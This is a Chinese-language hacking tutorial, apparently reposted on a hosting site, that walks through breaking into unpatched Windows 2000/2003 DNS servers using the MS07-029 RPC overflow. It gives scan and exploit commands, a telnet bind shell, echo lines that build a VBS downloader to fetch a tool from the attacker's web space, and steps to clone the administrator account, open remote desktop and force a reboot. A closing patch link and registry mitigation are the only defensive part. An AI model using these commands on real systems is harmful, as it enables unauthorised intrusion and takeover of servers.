首页 > > 服务器技术 > 安全防护 >

黑客实战:MS07-029漏洞利用入侵过程

2008-02-23 07:27:18来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

  前言:

  MS07-029,Windows 域名系统 (DNS) 服务器服务的远程过程调用 (RPC) 管理接口中存在基于堆栈的缓冲区溢出。漏洞的前提是没打补丁,开启DNS服务的所有版本WINDOWS 2000 Server和WINDOWS 2003 Server。

  今天,就让我带领各路英豪,踏上DNS EXP之路。

  我们先来看看所用工具的界面:

  这就是传说中的利用工具,可以通杀2000SEVER,2003SEVER系统,另外还具备了扫描功能!

  先用它来对主机进行扫描:

  在我们的命令行下输入:“dns –s 目标IP地址”

  稍等片刻,开放的端口以及操作系统以出现在我们面前,如果出现了如上图所显示的“1029:Vulnerability”那么恭喜你,你马上就会成功得到这台主机的权限了

  上图意思就是1029端口存在漏洞。

  现在我们来最关键的步骤――溢出:

  在命令行内输入

  dns -2003chs *.*.93.189 1029

  其中-2003ch的意思是操作系统的型号,-2003chs即简体中文版的2003系统,

  如果是2000的系统就使用“-2000all”参数,*.*.93.189就是我们的目标IP地址,1029就是刚才扫描出存在漏洞的端口”。

  出现“Attack sent ,check port 1100”字样,说明已经打开了目标地址的1100端口,我们TELNET上去:TELNET *.*.93.189 1100

  我们现在已经成功的入侵了对方的电脑,并且得到了管理员的权限。

  下面我给大家介绍一下如何在肉鸡上面开3389,

  在命令行里输入

  @echo with wscript:if .arguments.count^ tony.vbs

  @echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >> tony.vbs

  @echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then .echo "Error:" web.status:.quit >> tony.vbs

  @echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >> tony.vbs

  大概的意思就是在命令行创立一个用来下载的VBS脚本tony.vbs

  然后把开3389的工具上传到你的个人空间,

  我这里用的是火狐开3389的工具,在命令行里输入 cscript tony.vbs http://你空间地址/wrsky.exe c:\wrsky.exe

  “wrsky.exe -c”可以克隆当前管理员帐号

  再输入“c:\wrsky.exe -o 3551”

  意思就是打开对方的远程桌面服务,并且使用3551端口。

  用“wrsky.exe -k”可以检查3389是否开启,开启以后输入“wrsky.exe -r”,对方的电脑就自动重启以后就可以连接上去了。

  在运行里输入"mstsc",登陆上去。

  那熟悉而又亲切的画面出现在我们面前了。

  如果是2K的系统,还有一个更加傻瓜化的工具open3389,直接运行就可以了,不需要任何参数,不过对方电脑会马上重启。

  另外我还放了其他两个DNS利用工具和一篇ZWELL的精华文章在光盘里,有兴趣的朋友可以自己研究。

  这个漏洞的危害是是分巨大的,目前利用DNS服务RPC漏洞传播的蠕虫病毒VanBot已经出现,变种已经开始疯狂传播。

  WIN 2K或2003的朋友请赶快下载补丁

  http://www.microsoft.com/china/technet/security/bulletin/ms07-029.mspx

  或者打开记事本,输入:

  Windows Registry Editor Version 5.00

  [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters]

  "RpcProtocol"=dword:00000004

  保存为扩展名为 .REG 的文件,双击导入,再重新启动 DNS 服务即可。

关键词:
【推荐给好友】【关闭】
最新五条评论
查看全部评论
评论总数 0 条
您的评论
用户名: 新注册) 密 码: 匿名:
·用户发表意见仅代表其个人意见,并且承担一切因发表内容引起的纠纷和责任
·本站管理人员有权在不通知用户的情况下删除不符合规定的评论信息或留做证据
·请客观的评价您所看到的资讯,提倡就事论事,杜绝漫骂和人身攻击等不文明行为

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:专家谈手工查杀AV终结者病毒详解

下一篇:装机伴侣 万能Ghost镜像文件制作全过程

相关文章

IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设

网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源

网站联盟: 联盟新闻 联盟介绍 联盟点评 网赚技巧

行业资讯: 搜索引擎 网络游戏 电子商务 广告传媒

网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它

服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护

软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷

网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash

程序设计: Java技术 C/C++ VB delphi

网络知识: 网络协议 网络安全 网络管理 组网方案 Cisco技术

操作系统: Win2000 WinXP Win2003 Mac OS Linux FreeBSD

热门词条
最新资讯
热门关注
热门标签